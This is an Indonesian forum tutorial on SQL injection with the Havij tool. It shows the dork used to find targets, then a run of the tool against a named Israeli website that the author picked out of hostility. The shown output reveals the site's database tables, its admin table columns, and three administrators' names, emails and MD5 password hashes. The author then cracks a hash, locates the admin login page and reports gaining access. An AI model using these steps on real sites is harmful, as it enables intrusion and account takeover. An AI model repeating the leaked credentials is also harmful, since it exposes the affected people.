Download Tool Disini :
[You must be registered and logged in to see this link.]okeh kalo udah di download langsung aja ke tutorial nya :
gunakan dork apa saja
misal nya dork : inurl:index.php?page_id=
okeh berhubung tools ini buatan israel, saya akan Inject website milik israel juga !!!
Target :[indent]
[You must be registered and logged in to see this link.]jangan lupa tambahkan ' , sehingga menjadi
[You must be registered and logged in to see this link.]Posted Image
sekarang kita jalankan Havij nya, copast target yg tadi ke kolom target pada Tools Havij
Posted Image
klik analyze
hasilnya:
Havij 1.10 ready!
Analyzing
[You must be registered and logged in to see this link.]Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable
Current DB: xeniaco_xenia
w007s...... I Got the database... sekarang klik Tables lalu klik Get Tables
Posted Image
w007s..... I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1
Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.
Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja).
Posted Image
w007ss.... cool.. got to check it out... saya dapatkan kolom sbb
regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1
nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website
[You must be registered and logged in to see this link.] sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :
name
email
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).
lalu klik Get Data dan
Posted Image
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash crack..
Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat.... 30 detik deh). lalu hasilnya
Posted Image
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... password berhasil di-crack.. sekarang tinggal cari halaman login.
Klik Find Admin lalu isi Path to search dengan
[You must be registered and logged in to see this link.] lalu klik start.... .... ............. Searching
Got that....
Page Found:
[You must be registered and logged in to see this link.]Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access
Posted Image
Sekian ~
Subyek: SQL Injection Memakai Havij 
